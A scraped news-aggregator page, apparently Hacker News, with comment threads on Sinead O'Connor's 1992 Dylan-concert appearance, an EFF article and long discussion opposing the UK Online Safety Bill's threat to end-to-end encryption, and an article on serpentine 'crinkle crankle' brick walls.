Wow, I had no idea that lineup existed. Just started going down the YouTube rabbit hole. Thank you.
check 'Throw Down Your Arms' album. Not sure why, but it can only be found in YT.
https://www.youtube.com/watch?v=GzxTDHMQza8
To stand in the full blast of a crowd that hates you with that amount of poise, and have a voice that is still capable of song or even coherent speech, just beggars my imagination.
i hope you have found peace. you were a voice crying out in the wilderness and we did to you what we always do to that.
I've never seen this before. What an incredibly powerful act, this might have taken so much courage. Thank you for sharing!
Rolling Stone's look back, from 2021:
'Flashback: Sinead O'Connor Gets Booed Offstage at Bob Dylan Anniversary Concert'
<https://www.rollingstone.com/music/music-news/sinead-o-conno...>
Wow! The thing that surprised me most about this was it's a Bob Dylan tribute concert? I'm shocked religion still had such a hold on the kind of people attending that type of concert at that point in time. The volume is insane. Incredible strength to be able to stand and take such abuse and continue to perform.
Thank you for posting that. Her grace and defiance there were extraordinary. Peace for her.
636 points 4 days ago by pwmtr in 10000th position
www.eff.org | Estimated reading time – 7 minutes | comments | anchor
The U.K. Parliament is pushing ahead with a sprawling internet regulation bill that will, among other things, undermine the privacy of people around the world. The Online Safety Bill, now at the final stage before passage in the House of Lords, gives the British government the ability to force backdoors into messaging services, which will destroy end-to-end encryption. No amendments have been accepted that would mitigate the bill's most dangerous elements.
TELL the U.K. Parliament: Don't Break Encryption
If it passes, the Online Safety Bill will be a huge step backwards for global privacy, and democracy itself. Requiring government-approved software in peoples' messaging services is an awful precedent. If the Online Safety Bill becomes British law, the damage it causes won't stop at the borders of the U.K.
The sprawling bill, which originated in a white paper on "online harms" that's now more than four years old, would be the most wide-ranging internet regulation ever passed. At EFF, we've been clearly speaking about its disastrous effects for more than a year now.
It would require content filtering, as well as age checks to access erotic content. The bill also requires detailed reports about online activity to be sent to the government. Here, we're discussing just one fatally flawed aspect of OSB—how it will break encryption.
It's a basic human right to have a private conversation. To have those rights realized in the digital world, the best technology we have is end-to-end encryption. And it's utterly incompatible with the government-approved message-scanning technology required in the Online Safety Bill.
This is because of something that EFF has been saying for years—there is no backdoor to encryption that only gets used by the "good guys." Undermining encryption, whether by banning it, pressuring companies away from it, or requiring client side scanning, will be a boon to bad actors and authoritarian states.
The U.K. government wants to grant itself the right to scan every message online for content related to child abuse or terrorism—and says it will still, somehow, magically, protect peoples' privacy. That's simply impossible. U.K. civil society groups have condemned the bill, as have technical experts and human rights groups around the world.
The companies that provide encrypted messaging—such as WhatsApp, Signal, and the UK-based Element—have also explained the bill's danger. In an open letter published in April, they explained that OSB "could break end-to-end encryption, opening the door to routine, general and indiscriminate surveillance of personal messages of friends, family members, employees, executives, journalists, human rights activists and even politicians themselves." Apple joined this group in June, stating publicly that the bill threatens encryption and "could put U.K. citizens at greater risk."
In response to this outpouring of resistance, the U.K. government's response has been to wave its hands and deny reality. In a response letter to the House of Lords seen by EFF, the U.K.'s Minister for Culture, Media and Sport simply re-hashes an imaginary world in which messages can be scanned while user privacy is maintained. "We have seen companies develop such solutions for platforms with end-to-end encryption before," the letter states, a reference to client-side scanning. "Ofcom should be able to require" the use of such technologies, and where "off-the-shelf solutions" are not available, "it is right that the Government has led the way in exploring these technologies."
The letter refers to the Safety Tech Challenge Fund, a program in which the U.K. gave small grants to companies to develop software that would allegedly protect user privacy while scanning files. But of course, they couldn't square the circle. The grant winners' descriptions of their own prototypes clearly describe different forms of client-side scanning, in which user files are scoped out with AI before they're allowed to be sent in an encrypted channel.
The Minister completes his response on encryption by writing:
We expect the industry to use its extensive expertise and resources to innovate and build robust solutions for individual platforms/services that ensure both privacy and child safety by preventing child abuse content from being freely shared on public and private channels.
This is just repeating a fallacy that we've heard for years: that if tech companies can't create a backdoor that magically defends users, they must simply "nerd harder."
U.K. lawmakers still have a chance to stop their nation from taking this shameful leap forward towards mass surveillance. End-to-end encryption was not fully considered and voted on during either committee or report stage in the House of Lords. The Lords can still add a simple amendment that would protect private messaging, and specify that end-to-end encryption won't be weakened or removed.
Earlier this month, EFF joined U.K. civil society groups and sent a briefing explaining our position to the House of Lords. The briefing explains the encryption-related problems with the current bill, and proposes the adoption of an amendment that will protect end-to-end encryption. If such an amendment is not adopted, those who pay the price will be "human rights defenders and journalists who rely on private messaging to do their jobs in hostile environments; and ... those who depend on privacy to be able to express themselves freely, like LGBTQ+ people."
It's a remarkable failure that the House of Lords has not even taken up a serious debate over protecting encryption and privacy, despite ample time to review every every section of the bill.
TELL the U.K. Parliament: PROTECT Encryption—And our privacy
Finally, Parliament should reject this bill because universal scanning and surveillance is abhorrent to their own constituents. It is not what the British people want. A recent survey of U.K. citizens showed that 83% wanted the highest level of security and privacy available on messaging apps like Signal, WhatsApp, and Element.
Documents related to the U.K. Online Safety Bill:
Is this even enforceable? How can the UK government determine whether encrypted traffic going to/from UK IPs emanates from a messaging service as opposed to any other service?
This becomes a separate problem of against whom they choose to enforce it.
Defending yourself legally, no matter whether there's a lot or a little evidence, is an expensive, stressful, drawn out exercise.
Sometimes the accusation is the punishment.
>Is this even enforceable?
Not really, people have been talking in code for millennia. I wouldnt be surprised if a car company like Mercedes or Volkswagen could use their vehicles like swarm drones, relaying information between them when passing on the road, which could get data out of the UK using the cross channel ferries and eurotunnel.
There's way too much movement of people and stuff inorder to secure anything really. Even the new Apple headset can read the iris of the eye to get subconscious data out of the user when exposed to AV data, and the users wont even know they are giving out this data. Privacy? We dont have any!
Clandestine communications in cyber-denied environments Numbers stations and radio in the 21st century https://www.tandfonline.com/doi/full/10.1080/18335330.2023.2...
Number Stations https://www.youtube.com/@RingwayManchester
'Who denounced you?' said Winston. 'It was my little daughter,' said Parsons with a sort of doleful pride. 'She saw the installed encryption programs, and nipped off to the patrols the very next day. Pretty smart for a nipper of seven, eh? I don't bear her any grudge for it. In fact, I'm proud of her. It shows I brought her up in the right spirit, anyway.'
> Is this even enforceable?
They'll consider it enforced if all the major companies comply.
In terms of actually having the criminals using software that complies with the law, absolutely not. Making your own program that doesn't comply isn't much of a challenge.
The UK Government repeatedly fails to understand that there are no boarders on the internet, and it'd be impossible to impose any without the kind of extreme restrictions of a totalitarian regime.
Any measures without broad international cooperation will push vast number of people towards darker corners of the internet, which will not just end up completely undermining what they are trying to achieve, it will make the problems worse.
Meta alone have the power to make this law a miserable failure. People will want to use WhatsApp, the government themselves use it extensively. If meta refuses there is very little they can do. Facebook can continue to operate without a single person on the ground in UK. It might harm their business in some ways but it's definitely doable. The government might be able to force/convince Apple and Google to take it out their app stores in the UK but such regional restrictions are easily bypassed and WhatsApp is popular enough to make people try it. So that would then normalise the practices such as side loading / jail breaking and avoiding regional restrictions. Cyber criminals would be rubbing their hands at the opportunities this creates and I am sure the peodos and terrorists this is meant to be stopping will jump at the chance to get in on the act.
> If meta refuses there is very little they can do. Facebook can continue to operate without a single person on the ground in UK
If it came to it, Whatsapp could be blocked at the network level. All the gov need to do is impose regulations that forbid ISPs and other infrastructure hosts to carry the traffic.
The international network we used to know has been destroyed. It is fracturing into smaller regional networks with heavy filtering at the borders as countries seek to impose their little laws on it.
I'm glad I was able to experience the true internet while it lasted. Truly a wonder of this world.
Ever been to China? The internet certainly has borders and boundaries. Sometimes you can sneak across or get a visa, but individual nations make their own rules. Most people either follow them or remain unaware of them, and large multinational companies will typically follow local laws because they are juicy targets.
In the UK, companies which protest this law are threatening to leave the market. That would mean blocking UK users on their properties, not helping them find ways to break the law.
Or, when you say 'no boarders,' do you mean that the internet is not zoned for residential use? Sorry if I misunderstood.
>The UK Government repeatedly fails to understand that there are no boarders on the internet
Don't know what universe or timeline you're from, but on this earth today, the internet definitely has borders.
That's why we have those EU cookie banners and GDPR consent forms, and why some of my favorite piracy websites are blocked by all ISPs in my country, or why I can't watch Top Gear on BBC's website because I'm not from the UK, or why Facebook had to remove some politically spicy content worldwide because the courts where I live forced them to, etc, etc.
Mainstream web companies have to conform to local laws in each country or they'll get fined or blocked. Sure, there's VPNs to circumvent that, but the days of the lawless and borderless internet are a thing of the past.
Legislators, courts and bureaucrats (in this order) always fail to grasp such things. That's an idea erodes their jurisdiction and authority, and abhorrent to thee ethos.
No borders (from their POV), puts internet businesses above the law... which it sort of does. The global village happened, but global authority did not. There are no clean resolutions to some of these tensions.
I see no failure to understand. The UK is a pragmatic imperial power, not a collaborative cooperative peer. They built Empire upon the asymmetric application of technology. When time to surrender Empire, they did so. When time to build a Financial Empire, they did so. When the time comes to build an Internet Empire, I'm sure they will do that too, by applying whatever technology they have at hand.
>The UK Government repeatedly fails to understand that there are no boarders on the internet, and it'd be impossible to impose any without the kind of extreme restrictions of a totalitarian regime.
Why would the latter stop them? They have no problem with these.
>Any measures without broad international cooperation
Don't worry, other governments are just as shitty and want the same BS.
Even with a totalitarian regime, they cannot stop the rest of the world from using encryption. People can pull their business entities out of the UK and they have no jurisdiction outside their borders.
If I create an E2E messaging app, I don't need to listen to the UK at all. The UK can't tell me what to do any more than China can. China can block my app if they want, but it's on them, not me, to block it. Same goes for the UK. They can set up a firewall too if they want. But I don't need to change my app if I don't set foot in the UK.
> The government might be able to force/convince Apple and Google to take it out their app stores in the UK
Apple has even threatened to withdraw their own systems from the UK rather than comply with this.
https://9to5mac.com/2023/07/20/apple-imessage-facetime-remov...
I think it's dangerous to assume they fail to understand. These are smart people with good advisors. They just want to do it anyway. Which puts them in the category of evil.
Who would you rather be in the public eye, evil or stupid?
>The UK Government repeatedly fails to understand ... impossible to impose
Yeah but it's never worried them much in the past. As a Brit I occasionally come across the effects of them requiring ISPs to block piracy sites. Something comes up saying 'this site is blocked' so you click like one or two buttons to switch to a different connection or turn a VPN on (VeePN is good and free). I imagine their encryption ban will be similarly tricky to avoid. I think it's more about looking noble to the electors than actually achieving anything.
It's not impossible. The pandemic showed that you don't need a Hitler or Stalin figure to be ruled with an iron fist. The oligarchy could just make the pro encryption people the new ivermectin.
I think a large majority of the 'non technical' population would have no clue how to sideload apps, or even that it was possible, and that the more likely result of WhatsApp being withdrawn from the UK would be massive screaming from the public of such intensity and wrath that the government would be forced to backtrack.
To fully implement this would require dismantling vast amounts of software and protocols including VPNs, SSL/TLS, SSH, WebRTC, and loads more. Other countries won't want these protocols weakened just for the UK. It would end with the UK having a 'great firewall' and basically its own little Internet with tech-savvy people punching holes in it just like they do in China.
Hopefully the role of the UK is:
Mistakes: It could be that the purpose of your life is only to serve as a warning to others.
as others have said, it's not going to affect the rest of the world, UK will just lose access to services.
as a UK resident, i can safely say that we aren't going to do a single thing to stop this and we wholeheartedly deserve this and everything else the government does to strip away our rights. we are a nation of spineless cowards, do not feel bad for a single one of us.
the opposition not only wants this to become law, they are accusing the government of watering it down and not moving fast enough.
same for NGOs. they want the government to go even further.
various members of the public have come forward accusing the government of not doing enough to protect them from the perils of the internet (there were a few tragic cases, as it's always the case).
basically, everyone wants this, and want it sooner and strengthened.
I wish it would affect the rest of the world, so everyone else could at least give our government a well-deserved kicking. I've not checked but I would be doubtful that Sir Keir's Labour will reverse this dreadful bill, but if they do that will be welcomed.
'They' seem to be using the standard play book used by the rich and/or powerful against the will of the people. If you fail, keep trying and trying and trying until they get their way.
Well if the UK and other countries pass this, I guess it is back to gnupg. No way can that be restricted at this point.
> against the will of the people
it is not against the will of the people.
the opposition, NGO's and the general public are accusing the government of moving too slowly and watering down the law. they want the law strengthened and adopted faster.
Would this Online Safety Bill have protected Julian Assange from being imprisoned by a foreign totalitarian regime?
No. There's nothing that would have stopped that. If the US wants to make an example of someone, laws don't stop them.
Nice thought eh?
Doesn't help that Australian has some sweet FA to help one of its citizens. Weak as piss.
Everybody was fine using non-e2ee messaging for like 2 decades before whatsapp and competitors implemented it.
So why is it now so important, when since the early 90s everyone was totally happy to communicate without it?
Other people listening in on private conversations hasn't been 'fine' since the the first private conversation. It wasn't okay in the 90's and it isn't okay now. More people are aware now so more people are asking about it, which is making it seem more important, but it's always been important.
We don't use telnet anymore, we use SSH, and for good reason. That people that have never heard of ssh have the same demands for their communications shouldn't surprise you.
If you really don't understand why, look into a guy named Edward Snowden.
Stupid question maybe, but could certificate signing keys already be in government hands via backdoor (physical) handshakes/greased palms?
If this is the case, then you have to ask, why is this bill even needed?
A government would still have to make and use their own keys in a man-in-the-middle attack. The forged key means that if anyone bothers to check it will be detected, and there are also various ways that an application can lock the used key to make this impossible. Man-in-the-middle requires a lot of control over the infrastructure, for something that works reliably they would need to cooperate heavily with telcos, and spend a good deal of money.
That's a very bold claim, any evidence you can provide to support it? How do the governments sidestep Certificate Transparency, which makes the simple possession of the signing keys ineffective? And have there ever been reports of developers observing these rogue certificates in the wild?
[flagged]
The excess death rates between anti-vaxers and the vaccinated show that, in fact, the experts had it right all along.
Similarly here, experts are pushing to maintain encryption for the sake of public safety. Weird you think your two examples cast doubt on expertise.
Governments have always tried to maintain power through breaking secrets. But there's no evidence governments tried to do anything but vaccinate and protect their populations from COVID. How was any of that a power play? What irony?
[flagged]
why don't you save us all a bit of time and just go ahead and tell us exactly which rights we're allowed to have in order to protect the children in your perfect kingdom?
like, will you allow me to drive a car, or eat beef, or own a kitchen knife?
Nice username :)
I'm on the other side. IMO; CP is used more and more as an excuse to pass more anti-privacy agenda, because it is difficult to argue against 'We want to protect children'. That perspective moves discussion to a different place where it is difficult to discuss. Why can't we have both? Is only way to prevent CP eliminating privacy?
This begs the question of there being a 'scourge' of child porn and terrorist propaganda. You're also assuming the UK's attack on encryption would do anything at all to combat either thing let alone end the presumed 'scourge'.
Strong encryption is the foundation of pretty much all online commerce. Without it little else is practical online. It's not up to the EFF to come up with solutions to made up or exaggerated issues.
Your right to hunt down child porn does not exceed my right to privacy. To have it otherwise is to live in a panopticon.
Your comment is made in bad faith. Notably, you posted from a brand new account echoing the most inflammatory talking points that the government uses in support of eroding encryption. Either this is some blatant (and bad) astroturfing, or you've drunk the kool-aid from the government.
Nobody is here to defend child pornography or terrorism. But even accepting that they exist, those are a drop in the literal ocean of use cases for encryption relative to the overwhelmingly legal and productive and often necessary uses.
> They should come up with a useful alternative
We have a useful alternative - criminal laws. Make the criminal penalty a strong enough deterrent and you'll stop everyone except the most craven malfeasors (and those people will find ways to continue to disseminate their materials irrespective of encryption status).
Rather than accuse privacy supporters of being 'stubborn', you should come up with a legitimate argument why ordinary, law abiding people should have to sacrifice their autonomy in service of an effectively phantom boogeyman.
They're telling us it's a scourge.
But I suspect it's a relatively tiny, albeit terrible, problem compared to breaking encryption, which isn't just about privacy but about every action over the internet.
I don't see that you can have it both ways; secure encryption and being able to inspect traffic. There's no alternative so it's either using other mechanisms to go after CSE and terrorist material, as currently happens allowing us to know about the scourge, or we may as well revert to everything being on http.
How does this differ from the access and assistance bill in Australia?
While its super illegal for anyone to talk about, literally none of the actions that were going to be taken (Atlassian threatened to move overseas and stop servicing oz, Apple/Facebook/Google all rattled sabers) eventuated. We can only assume that the backdoors have been delivered on time without complaint.
Is it really considered a 'backdoor' for one party to willingly hand over the data that was exchanged through an encrypted channel? I'm not sure what you mean.
I honestly hate my current government with all my heart.
Let this series of badly-thought-out bills be destroyed in the courts once the courts find that reality bats last.
There's probably a clause in there that decrees Pi must be four from now on.
> Let this series of badly-thought-out bills be destroyed in the courts once the courts find that reality bats last.
How? I thought the UK courts can't override Acts of Parliament, because the courts are subordinate to it (unlike in the US).
It's not just the current government, the whole of Parliament including the various committees are eager to just go along with the intelligence and security agencies who tell them encryption is bad.
Your 'current' government has been in power for well over 10 years.
Is this legislation likely to land? I mean I'd expect all relevant vendors to drop the UK than to pick up so much liability and be expected to hold it world wide.
Apple told the US to suck lemons why would it kowtow to the UK.
It's a desperate lame-duck government, heading for an electoral wipeout of historic proportions - all bets are off.
Could you imagine if the UK was just... cut off from the rest of the western internet?
What a time to be alive.
zero chance. did anything happen in australia after they passed a very similar law? nope.
https://fee.org/articles/australia-s-unprecedented-encryptio...
I hope that will be the response. I wish the same had happened when the EU passed the stupid cookie law. Everyone should have replaced their websites with a static page that explains browser cookie settings when accessed from Europe.
Maybe when they were part of the E.U it mattered what the U.K did but now they do not seem important enough to be able to dictate things on a global scale. Not trying to put it down but do people worry about how Estonia's law will affect the rest of the world?. Nobody cares, because you are just not a big enough market to matter.
I'd agree with you but all governments think alike and I'm sure this will reach the EU and the states (with whatever excuse they can think of)
This is uber stupid, because it will create way more divided internet (all countries will start separating further) and will create loss of trust in western/UK/US products (why would rest of the world continue to use iPhone/MacBook, google, Amazon, etc,..) therefore it will have huge cost in terms of lost revenue to all big companies. On the other hand there are smarter ways to do what is needed that respect privacy and do not cause such unnecessary economic harm to companies, but hey we'd need to have smart people in the governments (which are full of not smart people). Another aspect is that this will be unenforceable for huge majority of individuals since there will be plenty of solutions that will circumvent this, plus then number of companies will start forming companies in non affected geo's (off shore etc) and provide for example alternative to Viber/Skype/google/etc.. (some already exist).
> it will create way more divided internet (all countries will start separating further)
IMHO that's the future.
Funny thing is, this doesn't hurt criminals at all. If you're doing serious crime, you bring your own encryption. There are cartels that spend a lot of money rolling their own crypto.
In the UK we have a huge problem with children sending hateful communications online which cause anxiety and distress. As it stands we can only arrest children who are doing this in public but banning encryption should give authorities more power to arrest children who are committing these crimes in private (eg on WhatsApp).
The list really of hate crimes being committed online is endless and these are just the criminals doing this in public:
https://news.sky.com/story/teenager-jailed-for-sending-racis... https://www.bbc.co.uk/news/uk-england-merseyside-4381692 https://www.bbc.co.uk/news/uk-england-tyne-52877886
Heck, they roll their own infra. Billions in cash buys a lot of tech.
https://www.reuters.com/article/us-mexico-telecoms-cartels-s...
> gives the British government the ability to force backdoors into messaging services
This is NOT enforceable outside the UK any more than Chinese law enforceable outside China. If you are a messaging service, just close all your business entities in the UK and they have no more jurisdiction over you. People in the UK can still use your messaging services unless the UK decides to implement a firewall like China.
> which will destroy end-to-end encryption
I don't trust any E2E encryption unless at least the clients are open source. How do I know the NSA hasn't inserted a backdoor into WhatsApp?
And then if the clients are open source, the back doors they insert (via git pull requests?) can be removed.
Or they can be scraping screens so it does not matter whether your encryption is 'trusted'.
I run an encrypted XMPP server for about a dozen people. It's completely ephemeral in the sense that the server stores no messages. If you're offline, you miss them, kind of like IRC.
Will this apply to me? Do I need to ensure that no UK users are on my server?
I never anticipated this back when I set up the server. I thought that implementing strong security and privacy measures was a responsibility that I should take seriously.
I wouldn't be willing to run the server if I had to compromise people's privacy. If you don't have privacy, you might as well be on a mega-corp service.
The UK is an island, physically and metaphorically. It can dig its (financial) grave if it wants to, the rest of the world won't really care much.
The headline is false.
Indeed. The article itself doesn't explain why this will affect the rest of the world. In fact, Apple has said they would consider withdrawing FaceTime and iMessage in the UK if this law goes ahead, so I think it is unlikely it will affect the rest of the world. Either the UK will be left with fewer encrypted products, or they will do a u-turn.
https://www.theguardian.com/technology/2023/jul/20/uk-survei...
The UK is a number of islands.
The main one being Great Britain, plus a chunk of Ireland. There are then a number of smaller islands around the English, Welsh, and Scottish parts of Great Britain.
The rest of the world is taking notes. They're trying to push something similar through in the EU. The US has at least 2 or 3 bills active right now that would have similar effects.
I hope all the intelligent people eventually move away from those authoritarian governments' countries, moving all the brainpower away from serving their economies.
I'm a UK resident not opposed to this bill.
First, child protection is paramount.
Second, The erosion of big tech companies' power is a benefit as far as I can see.
Third, We still have effective encryption in our hands. TLS is not going to be broken by this.
The argument that offenders will be pushed into darker corners of the internet is probably true, though I expect that will make it easier for law enforcement - take ANOM [1] as an example.
The battle I'd fight would be some kind of accountability in intelligence services.
what does a black market on encrypted comms look like? if they can't read your communication logs you go to jail?
There's already a crime of refusing to provide a password. With a maximum sentence of two years imprisonment, or five years in cases involving national security or child indecency.
https://www.saunders.co.uk/news/prosecuted-for-your-password...
I see a few comments suggesting a change of government will help.
The previous Labour government (1997-2010) introduced the Regulation of Investigatory Powers Act 2000 (https://en.m.wikipedia.org/wiki/Regulation_of_Investigatory_...), which amongst other provisions includes key disclosure rules (https://en.m.wikipedia.org/wiki/Key_disclosure_law#United_Ki...). The burden of proof in key disclosure is inverted (the accused must prove non-possession of the key or inability to decrypt), which was somewhat controversial amongst people who cared at the time (activation, i.e. actual use if RIPA III provisions, began in 2007).
The same Labour Government ran the Interception Modernisation Programme (https://en.m.wikipedia.org/wiki/Interception_Modernisation_P...) (you may recognise this or 'mastering the internet' from the Snowden leaks, although IMP was not a secret) and proposed legislation to enact part of it: https://en.m.wikipedia.org/wiki/Communications_Data_Bill_200.... This never made it into law.
I think Labour are on board with this, and the senior civil service (those at the top levels who work with ministers or close to those who do) don't change in the same way US administrations do. It might be the case that this bill runs out of time in the current parliament and is not picked up by the next government (this can happen even if the same political party holds office) but the idea will be back in some form one way or another and I suspect will make it into law.
Given Labour also have not committed to reverting the anti-protest laws that were brought in by Suella Braverman, and where the Deputy Leader of the Opposition said along the lines of 'now is not the time to review that' when a caller literally asked that question, I don't hold out much hope for them doing anything progressive in relation to this.
It's not made clear how the UK Gov would erode encryption worldwide
Seems like they'll only be stuck with their own police state friendly system.
People on the other end of encrypted conversations outside of the UK would also be surveilled.
More broadly, any backdoor built into any app can and will be exploited by bad actors. Theres no 'safe' way to break end to end encryption for just the ' good guys'.
It will absolutely erode encryption in my country. Our government seems to operate on the following logic:
1. We want to be a developed country.
2. X is a developed country.
3. X does Y.
4. Therefore, we must also do Y.
We have our own GDPR. I've seen judges citing european laws in decisions. Watching other countries pass laws like this one is like getting a glimpse into the future.
I wonder what twisted shit the tories are looking at online. We already know they watch porn in the commons. By eroding encryption we'll soon be seeing what they look at in the privacy of their own homes.
Because labour would never. You think this will go away when labour get in?
This nation gave us the first mecahnical computer, the first programming language, Alan Turing, the first digital computer, broke the Enigma encryption, and the World Wide Web... and now, this.
> broke the Enigma encryption
Poland?
> and the World Wide Web
CERN is a country?
If you live in the UK, then please go to the UK Government and Parliament website and sign your name on this petition: https://petition.parliament.uk/petitions/634725
It's currently at 6,327 signatures; it needs 3,673 more for the government to respond and 90,000 more after that for a debate to be considered.
This is interesting- 6k signatures (and just the one (no duplicate) petition when searching seems very low. I suspect there isn't a huge amount of knowledge in the Facebook-mass-share spheres that usually kick these petitions into the big numbers.
Writing to your MP (don't use a template) would be more effective. I have yet to see a single one of those petitions that resulted in anything more than a brush off. Even much more popular ones.
Letters to MPs almost always result in a brush-off too but they do take notice of them at least. Very occasionally you do get a non-template response too.
I'm curious how many companies will just block the UK rather than comply. It's definitely not going to be zero.
Do they even have to block UK users?
Can't they just remove any business presence in the country to free themselves from any potential legal troubles?
The whole thing will fail once they realise how impossible this is to implement.
Let me guess, to protect the children and the rest of us from terrorists?
You know bad actors won't care about your bill, I would love to see how the government is going to block an email encrypted with gpg?
> to protect the children and the rest of us from terrorists
Don't forget the pedophiles.
i guess this thread is a great example of how different the HN crowd is to the rest of the population. i keep seeing the same type of comments for every article where encryption is threatened.
to me it looks like the direction of policy in the world when it comes to the internet is pretty clear: the internet needs to be brought to heel. it needs to respect local laws, it can't be a black box, we can't rely on foreign/american companies to moderate.
this direction is coming mainly from voters. they feel disenfranchised from the big internet companies, they feel threatened, the internet still feels like a dangerous place. and to be fair, there are so many crimes enabled by the internet, some of them violent.
and so the public and the NGO's make enough noise so that politicians take stock and start doing something about it.
this law is not the first law in the world to force internet companies to better moderate their content. and it won't be the last.
but if HN folk want to change people's view around this issue then they need to step out of this bubble and engage with people's concerns.
because this direction of travel has been set for a while now. and it won't change anytime soon.
what's going to happen with this law? nothing special. it will be adopted, and there will be no consequences. just like all the other countries that did the same.
disclaimer: i've been on the internet since there were ~10 websites. that wild west stuff was amazing when growing up. but the cat is now out of the bag.
There was even pushback on HN to Apple's communication safety feature which would warn kids about nude photos. No big brother, not even CSAM matching. Just locally run nudity detection in a reasonable, even minimal effort to address some harm to kids.
Comments wailed about the invasion of privacy, thin end of the wedge/normalisation of scanning etc. without any mention of the problem this tries to address.
Personally I still think the risk of encryption to children is outweighed by the risk of permanent, incontestable authoritarian regimes (in which kids aren't safe either). But effectively arguing this requires acknowledgement of the other side's concerns.
As you say, most people prioritise child safety over privacy, so these bills are going to keep happening until the rest of us make our case, acknowledge the problem and help find solutions.
But I disagree there will be no domestic consequences for this law. The UK is the home of the coverup and this places even more power in the hands of a barely accountable old boys club. It should still be opposed, but privacy activists need to better make the case why.
We could outlaw math. Or the police could start doing their job.
https://www.newscientist.com/article/2140747-laws-of-mathema...
Australia tried that. This must be resisted wherever it appears.
>We could outlaw math.
Maybe that's why math education is being sabotaged.
I think they'd argue that this is them doing their job: trying to negate the advantages that sophisticated criminals have over law enforcement efforts.
Could you elaborate on what you see as 'doing their job' in this context?
That would require the UK government to fund the police properly. And the courts. And the judiciary. And the prisons.
For a political party that likes the cliché 'tough on crime', it's kinda surprising how far on the path to accidental anarchy they are.
The police can do legal wiretaps because it is a tremendous help to get the job done.
That's the problem with e2e encryption: it makes the police's job much, much more difficult.
That's the point. People have to realise that there is a real issue which does not have a simple solution.
They already are. They imprison journalists under terrorist acts if they criticise the gov or they come knock on your door if you put mean things on twitter.
But corrupt politicians? That's not a bug, it's a feature.
I wrote this about 6 years ago when the then PM was trying to do the same thing - http://coding2learn.org/blog/2017/06/11/dear-theresa/
Yeah well I have an AR-15 try to take my BSD and OpenSSL away bitch I dare you.
Could you please stop posting unsubstantive comments and flamebait? You've unfortunately been doing it repeatedly. It's not what this site is for, and destroys what it is for.
If you'd please review https://news.ycombinator.com/newsguidelines.html and stick to the rules when posting here, we'd appreciate it.
Most sieges don't tend to end well for the person inside the building.
To break from the party line and parrot that E2E encryption is a human right for just a moment, does anyone else experience the same fatigue with communities on encrypted platforms? I've never found a good community on Tor, everyone on Signal seems to become a shadier version of their public selves, Telegram seems it's all full of smut.
However I believe this is due to my small social circle. Does anyone with better social skills (any at all) have a more positive experience with E2E platforms? Please help me out because I want to believe. I believe it's important for people to speak freely but I'm having trouble reconciling that with how nasty they become.
I don't see how E2EE services affect people's behaviour.
Anonymity does though.
WhatsApp is end to end encrypted, this has been proven in actual court in my country. Everyone here uses it for everything every day. Never before have so many people used something that is this secure by default.
> Telegram seems it's all full of smut
Telegram is not E2EE.
(Unless you use secret chats, which hardly anyone does.)
For context this is a cross party designed in committee policy.
Yes, both parties are that bad.
The dumbest thing about this is you create a single attack vector for nation state enemies who we know now all have the facilites to exploit this.
You might as well just turn the lights off and hand Russia, China, Iran, N. Korea the keys.
> Yes, both parties are that bad.
If I read this correctly (https://en.wikipedia.org/wiki/List_of_political_parties_in_t...) there are twelve parties in Westminster
Still, an early general election would put the brakes on this bill. The next Labour government will be under no pressure to pick it back up, and in fact will likely be under quite a bit of pressure to let it go.
This is the sort of terrible throwaway law that results from lame-duck governments.
I hate our government but the media has a massive part to play in propping them up.
All the tech companies should stand together and be ready to block access to their services. Imagine if the UK was left without access to just WhatsApp, let alone iMessage etc. It's not irresponsible or unsafe, there's always SMS for which the govenment has full control over.
Also I don't think any of these companies should fear an competitors. Why? These services are so ingrained a few weeks if not months of protest will not change anything. When the govnement finally succumbs restoration will be easy and the numbers will go back to normal quickly.
Agree - a UK without WhatsApp would be a UK in revolt. Literally everyone I know from teens to oldies organises their lives on it. Lack of WhatsApp would be enough to drag our sorry apathetic lazy non-protesting arses out onto the street
I watched an interview with David Yelland, former editor of the Sun, recently where he said that the news media in the UK is more or less run by the same minority class of people who typically work as spads[1]. That would follow your point that the media props them up, because it is a homogenous and tight knit community now between media and politics.
[1] https://www.theguardian.com/politics/2015/apr/19/spads-speci...
635 points 5 days ago by caiobegotti in 543rd position
twistedsifter.com | Estimated reading time – 2 minutes | comments | anchor
How cool is this! Popularized in England, these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
According to Wikipedia, these wavy walls are also known as: crinkle crankle walls, crinkum crankum walls, serpentine walls, or ribbon walls. The alternate convex and concave curves in the wall provide stability and help it to resist lateral forces. [source]
The county of Suffolk seems to be home to countless examples of these crinkle crankle walls. On freston.net you can find 100 wavy walls that have been documented and photographed. In the United States, the best known serpentine wall can be found at the University of Virginia where Thomas Jefferson incorporated the wavy walls into the architecture. Although some authorities claim that Jefferson invented this design, he was merely adapting a well-established English style of construction. [source]
As for the mathematics behind these serpentine walls and why the waves make them more resistant to horizontal forces like wind vs straight walls, check out this post by John D. Cook.
Below you will find additional examples of these intriguing wavy walls that lawnmowers surely detest!
[h/t smell1s on reddit]
Categories: ARCHITECTURE, BEST OF, DESIGN, HISTORY, STORIES, TRAVEL Tags: · bricks, construction, design, engineering, england, mathematics, patterns, top, walls
> As for the mathematics behind these serpentine walls and why the waves make them more resistant to horizontal forces like wind vs straight walls, check out this post by John D. Cook.
The linked post does not explain why the walls are more resistant to forces. It just calculates the difference in length.
Did my adblocker accidentally filter out the explanation?
Following the link which is supposed to explain another thing, why it is more resistant to lateral forces, it contains an explanation:
> The parameter a is the amplitude of the sine wave. If a = 0, we have a flat wave, i.e. a straight wall, as so the length of this segment is 2π = 6.2832. If a = 1, the integral is 7.6404. So a section of wall is 22% longer, but uses 50% less material per unit length as a wall two bricks thick.
'as a wall two bricks thick'. Hmmm. Even bigger savings as a wall three bricks thick.
The point is that a straight wall one brick thick will fall down.
Though I didn't see any real explanation of why a straight wall one brick thick will fall down...
I believe I've read that some plants do better when planted in the concave portion of a wavy wall, because the bricks absorb warmth during the day and release it at night.
Not sure about the actual function that defines the wave, but let's assume they are convex and concave semi circles. Then to make a wall of length L with bricks of l length, we need piL/l number of bricks. The linked Reddit post says a straight wall needs to be 2 bricks wide to have the same length, which needs 2L/l number of bricks which is fewer than the wavy walls
It's not one giant semi circle. Lets say each semi-circle has a radius of about 2 ft (judging by the pictures). Every 8 ft section (1 wave/one full cicle) takes 2pi2 ~= 12.56, while the straight wall takes 8*2 = 16 bricks.
Semicircles seem excessive. At no point does the wall have an angle over 45 degrees, so a semi-circle which would be at a 90 degree angle for every inflection point seems way too wavy.
